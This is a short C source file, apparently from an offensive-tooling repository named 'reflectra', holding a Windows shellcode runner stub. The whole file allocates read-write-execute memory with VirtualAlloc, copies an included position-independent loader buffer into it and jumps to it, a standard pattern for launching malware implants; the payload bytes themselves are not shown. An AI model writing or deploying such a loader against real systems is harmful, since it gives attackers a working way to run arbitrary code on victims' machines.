Files
k1ng0fn0th1ng-reflectra/stub/stub.c
T
2026-04-14 12:44:25 -04:00

15 lines
332 B
C

#include <windows.h>
#include "pic.h"
int main()
{
PVOID pShellcode = VirtualAlloc(NULL, crystal_loader_len,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
memcpy(pShellcode, crystal_loader, crystal_loader_len);
((void(*)())pShellcode)();
return 0;
}